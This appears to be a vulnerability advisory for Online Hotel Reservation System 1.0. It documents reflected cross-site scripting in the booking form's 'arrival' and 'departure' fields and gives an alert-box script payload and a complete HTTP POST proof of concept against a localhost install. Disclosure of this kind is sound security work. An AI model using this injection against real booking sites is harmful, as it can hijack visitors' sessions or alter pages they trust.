Online Hotel Reservation System version 1.0 suffers from multiple cross site scripting vulnerabilities. Original discovery of cross site scripting in this version is attributed to Mesut Cetin in January of 2021.
0edf6c9cc89607788d24c82489b990e2# Exploit Title: Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)
# Date: 2021-08-02
# Exploit Author: Mohammad Koochaki
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/marimar.zip
# Version: 1.0
# Tested-on: Ubuntu 20.04.2 LTS, PHP 7.4.3
### This application is prone to a cross-site scripting in the 'arrival' and 'departure' parameters at the following path:
- http://localhost/marimar/index.php?p=booking
### Payload: "></div><script>alert("XSS-MSG")</script>
### PoC:
POST /marimar/index.php?p=booking HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://localhost
Connection: close
Referer: http://localhost/marimar/index.php?p=booking
Cookie: PHPSESSID=9ck943m19rugu8d7q7d6mh6fnt
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
arrival="></div><script>alert("arrival")</script>&departure="></div><script>alert("departure")</script>&person=0&accomodation=0